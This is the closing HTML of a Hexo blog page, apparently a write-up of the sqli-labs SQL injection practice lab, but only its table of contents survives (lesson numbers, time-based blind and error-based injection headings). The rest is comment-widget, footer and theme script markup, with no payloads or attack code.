        <i class="fa-solid fa-comments"></i>&nbsp;评论
    </div>
    

        
            
 
    <div id="waline"></div>
    <script type="module"  data-swup-reload-script>
        import { init } from '/js/libs/waline.mjs';

        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://example.example.com',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
            });
        }

        if ('true') {
            const loadWalineTimeout = setTimeout(() => {
                loadWaline();
                clearTimeout(loadWalineTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadWaline);
        }
        
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">此页目录</div>
        <div class="page-title">sqli-labs</div>
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#less-03"><span class="nav-text">less-03</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-04"><span class="nav-text">less -04</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-9-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-text">less-9(时间盲注)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-10"><span class="nav-text">less 10</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less11"><span class="nav-text">less11</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#less-17"><span class="nav-text">less 17</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#extractvalue%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-text">extractvalue报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#updatexml%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-text">updatexml报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#group-by%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-text">group by报错注入</span></a></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">The Redefine Team</a>
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.5.0</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>







<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/libs/anime.min.js"></script>

        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
